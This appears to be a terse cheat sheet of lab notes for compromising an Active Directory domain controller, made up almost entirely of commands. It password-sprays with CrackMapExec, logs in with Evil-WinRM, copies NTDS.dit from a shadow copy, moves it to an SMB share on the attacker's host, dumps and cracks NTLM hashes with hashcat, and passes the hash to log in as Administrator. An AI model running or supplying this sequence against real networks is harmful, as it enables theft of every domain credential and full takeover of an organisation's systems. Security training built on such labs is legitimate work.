Active Directory and NTDS.dit

Username Anarchy

./username-anarchy -i /home/ltnbob/names.txt  

Attacking with CrackMapExec

$ crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

Capturing NTDS.dit

Connecting to the DC using Evil-WinRM

$ evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Checking Local Group Membership

*Evil-WinRM* PS C:\> net localgroup

Checking User Account Privileges including Domain

*Evil-WinRM* PS C:\> net user bwilliamson

Creating Shadow Copy of C

*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

Copying NTDS.dit from the VSS

*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Transferring NTDS.dit to the Attack Host

*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData 

Using CrackMapExec to capture NTDS.dit

$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Cracking Hashes and Gaining Credentials

$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Pass-the-Hash using Evil-WinRM

$ evil-winrm -i 10.129.201.57  -u  Administrator -H "64f12cddaa88057e06a81b54e73b949b"